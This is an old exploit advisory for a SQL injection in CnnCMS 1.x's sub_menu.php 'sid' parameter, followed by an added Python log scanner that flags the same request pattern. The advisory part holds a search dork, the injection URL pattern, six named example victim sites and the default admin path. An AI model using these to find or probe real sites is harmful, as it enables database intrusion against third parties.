CnnCMS 1.x SQL Injection Vulnerability



EKU-ID: 1584
CVE:
OSVDB-ID:
Author: X-Cisadane
Published: 2012-03-06
Verified: Verified

:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : CnnCMS 1.x SQL Injection Vulnerability
: # Date : March 3rd 2012
: # Author : X-Cisadane
: # Software Link : http://www.thinknolimits.com/
: # Version : 1.x
: # Category : Web Applications 
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome 14.0.835 (Windows)
: # Dorks : inurl:sub_menu.php?sid=
: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:-------------------------------------------------------------------------------------------------------------------------: 

SQL Injection Vulnerability :
- Open Victim Website : http://<site>/<CnnCMS Path>/sub_menu.php?sid=-[SQL]

Example :
http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13 
http://lunar.co.id/sub_menu.php?sid=-1
http://www.djawaleather.com/sub_menu.php?sid=-1
http://www.gravigra.com/sub_menu.php?sid=-1
http://www.harpagreen.com/sub_menu.php?sid=-2
http://www.suwastama.co.id/sub_menu.php?sid=-1

Admin Page (Default) : http://<site>/<CnnCMS Path>/admin/
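
A defensive check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web-server access log lines for requests to sub_menu.php whose sid value is not a plain integer. The Combined Log Format layout, the assumption that legitimate sid values are non-negative integers, the function names and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a Combined Log Format line: "METHOD URI PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<uri>\S+) HTTP/[\d.]+"')
# Assumption: legitimate sid values are plain non-negative integers.
VALID_SID = re.compile(r"\d{1,10}")


def suspicious_sid(line):
    """Return the decoded sid if the request targets sub_menu.php with a
    sid that is not a plain integer; otherwise return None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    if not parts.path.lower().endswith("/sub_menu.php"):
        return None
    # parse_qs percent-decodes values, so encoded input is checked decoded.
    values = parse_qs(parts.query, keep_blank_values=True).get("sid", [])
    for value in values:
        if not VALID_SID.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client_ip, sid) for every flagged log line."""
    hits = []
    for line in lines:
        sid = suspicious_sid(line)
        if sid is not None:
            hits.append((line.split(" ", 1)[0], sid))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Mar/2012:10:00:01 +0000] "GET /sub_menu.php?sid=13 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Mar/2012:10:00:05 +0000] "GET /sub_menu.php?sid=-13 HTTP/1.1" 200 310',
    '198.51.100.7 - - [06/Mar/2012:10:00:09 +0000] "GET /cms/sub_menu.php?sid=-1%27 HTTP/1.1" 200 298',
    '203.0.113.4 - - [06/Mar/2012:10:01:00 +0000] "GET /index.php?sid=-1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, sid in scan(SAMPLE_LOG):
        print(f"{ip} sent non-integer sid {sid!r} to sub_menu.php")
```

The same integer-only rule, enforced in the application before the value reaches the query (together with a parameterized query), removes the injection point rather than just reporting on it.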